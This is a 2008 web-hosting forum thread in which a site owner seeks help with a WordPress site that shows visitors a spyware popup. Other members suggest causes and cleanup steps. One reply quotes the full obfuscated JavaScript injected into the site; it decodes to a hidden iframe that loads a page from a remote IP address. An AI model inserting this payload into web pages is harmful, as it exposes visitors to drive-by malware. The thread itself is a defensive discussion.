1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.
  2. Better Analytics for WordPress Get It Free

please check my site for virus

Discussion in 'Security' started by falguni1, Jun 22, 2008.

  1. #1
    this is my site http://beautymakeupdivas.com and when I click on the categories I get a spyware window. do you get it too please check.

    do I need a make a fresh install.

    [​IMG]
     
    falguni1, Jun 22, 2008 IP
  2. MakeThatDollar

    MakeThatDollar Notable Member Premium Member

    Messages:
    4,451
    Likes Received:
    157
    Best Answers:
    0
    Trophy Points:
    225
    #2
    The only thing I saw fishy in your sites' code was the following that was on the bottom:

    <script>
    <!--
    var d=document,kol=561;
    function O10H485E4FAA5AA64(H485E4FAA5B22B){ function H485E4FAA5B623() {var H485E4FAA5BA1F=16;return H485E4FAA5BA1F;} return( parseInt(H485E4FAA5B22B,H485E4FAA5B623()));}function H485E4FAA5BE1D(H485E4FAA5C218){ function H485E4FAA5CE0D() {var H485E4FAA5D209=2;return H485E4FAA5D209;} var H485E4FAA5C614='';for(H485E4FAA5CA27=0; H485E4FAA5CA27<H485E4FAA5C218.length; H485E4FAA5CA27+=H485E4FAA5CE0D()){ H485E4FAA5C614 += ( String.fromCharCode (O10H485E4FAA5AA64(H485E4FAA5C218.substr(H485E4FAA5CA27, H485E4FAA5CE0D()))));}return H485E4FAA5C614;} document.write(H485E4FAA5BE1D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323938353832292B2766663933653563615C272077696474683D363734206865696768743D343433207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>
    PHP:
    So it's probably in your footer.php file or something.
     
    MakeThatDollar, Jun 22, 2008 IP
  3. falguni1

    falguni1 Peon

    Messages:
    3,019
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #3
    so which file should I change. I cant understand what to do.
     
    falguni1, Jun 22, 2008 IP
  4. TheSyndicate

    TheSyndicate Prominent Member

    Messages:
    5,363
    Likes Received:
    289
    Best Answers:
    0
    Trophy Points:
    315
    #4
    Did not see anything strange but i did not check the code just search
     
    TheSyndicate, Jun 22, 2008 IP
  5. falguni1

    falguni1 Peon

    Messages:
    3,019
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #5
    do you mean to say that all you people donot see the spyware window.
    to see the spyware window click on the categories.
     
    falguni1, Jun 22, 2008 IP
  6. bbrian017

    bbrian017 Active Member

    Messages:
    2,954
    Likes Received:
    65
    Best Answers:
    0
    Trophy Points:
    90
    #6
    I have windows one care and when I went to this site it prompt to clean windows download trojan, so don't go visiting this site!
     
    bbrian017, Jun 22, 2008 IP
  7. nastynappy

    nastynappy Banned

    Messages:
    499
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    0
    #7
    it happened with me too, it happened with every website i opened.
    then I installed Anti ARP, re installed my windows xp and installed Avast anti virus.
    Its ARP attacks you are having.
    Install Anti ARP , its the only good solution to this problem.

    I had this problem about a week ago before I started using Anti ARP
     
    nastynappy, Jun 23, 2008 IP
  8. falguni1

    falguni1 Peon

    Messages:
    3,019
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #8
    are you talking about my site beautymakeupdivas.com



    I have formatted my hard disk and installed windows XP. so there is no virus in my pc now.

    please some somebody knowledgeable help me.

    what to do to remove virus from my site.

    my site is getting traffic, somebody help me fast.
     
    falguni1, Jun 23, 2008 IP
  9. falguni1

    falguni1 Peon

    Messages:
    3,019
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #9
    please somebody read this thread.

    I got my pc formatted and contacted my host.
    they deleted all my files everything. and there are no folders now.

    I made a complete fresh install of wordpress and made a first post today and when I clicked on categories I get this window of virus.

    I am fed up.

    should I change my host.

    I cant understand what to do.

    the host deleted every file and folder and everything is new now, but I still get the virus window.
    should I change my host.
    I am using hostmonster.
     
    falguni1, Jun 23, 2008 IP
  10. lordadel

    lordadel Active Member

    Messages:
    1,035
    Likes Received:
    88
    Best Answers:
    0
    Trophy Points:
    90
    #10
    Look sometimes the virus is not on your PC

    Are you in a LAN network or something? because it happened with me i am in a network and i had spyware alert in every page i open then i found out that One of the PC's on the network was infected which caused this it uses some sort of ARP attacks so try to get anti ARP
     
    lordadel, Jun 23, 2008 IP
  11. falguni1

    falguni1 Peon

    Messages:
    3,019
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #11
    virus is not in my pc because I formatted it.

    virus is not on LAN network because other the sites that I am surfing, I cannot see the virus.

    The virus is in my wordpress installation.

    everytime I install a new wordpress it gets loaded.

    I have deleted all files my host and installed wordpress again, then to it is infected.
     
    falguni1, Jun 23, 2008 IP
  12. kalapacengkir

    kalapacengkir Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #12
    falguni1,

    i agree that the problem (trojan?) isn't on your pc, nor on you LAN. but i don't think it's on your wordpress, because people with other cms (or even wrote their own php script) are infected too.

    imho, my best guess is it's on the process, it might be cracked ftp warez or unsafe ftp password.
    i just changed my ftp client, fixed infected file (index.php or index.html), and changed ftp password.

    and -voila- problem's solved!

    this is also a discussion to view hxxp://wordpress.org/support/topic/182061 (you already knew).

    ps.
    a friend of mine was too late to repair, then google marked it as dangerous, and his webhost deleted his files :(.. so please be quick.

    may this help.

    regards,
    kalapacengkir
     
    kalapacengkir, Jun 23, 2008 IP
  13. skaterkee

    skaterkee Active Member

    Messages:
    652
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    88
    #13
    I had this a few days ago and now have it cleaned.

    Basically a hacker has got in to your site via a insecure php script (both cutenews and coppermine have been named but it could be hundreds of different things. Maybe even a dud wordpress plugin)

    The guy uploads some hidden file in like a jpeg or something (some people found a zip files so search your server for any weird ones)

    He then activates it somehow and all files with the prefix index and sometimes login are injected with the code that was shown above causing the popup to show the virus. Users then blindly install the software only to have their pc frozen and forced to send the hacker money.

    What I did was uninstall any unnecessary php scripts and their databases. Changed all the databases users and passwords. Replaced all my server files with backups from a few weeks ago (you could clean the files manually by removing the code although I found there was some kind of lock that prevent them from opening in notepad) Once you are sure the server is clean ask your host to use a virus scan or use cpanels virus scan if you have it.

    Once that is done change your ftp/cpanel password and you may even want to change ftp client.

    After two days I'm clean - but don't fall in to the trap of removing the code from the few files you think it is infected in because it comes back. Wipe everything or replace it all with a backup.

    Be quick because my site got labeled as harmful by google and have since lost 50% of traffic - it'll take days before they re-review my site.
     
    skaterkee, Jun 23, 2008 IP
  14. falguni1

    falguni1 Peon

    Messages:
    3,019
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #14
    here is what I did.

    reset my hosting account means deleted all files.
    and changed my login password, now I did fresh install and everything is ok because I changed my password.
     
    falguni1, Jun 24, 2008 IP
  15. divineaccessories

    divineaccessories Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #15
    Please please help, my website divineaccessories.com was hacked a couple of months ago then I got all viruses removed and put up a new site with webprotection seal, but it appears that it has virus in it. Can somebody please check and advice
     
    divineaccessories, Nov 9, 2010 IP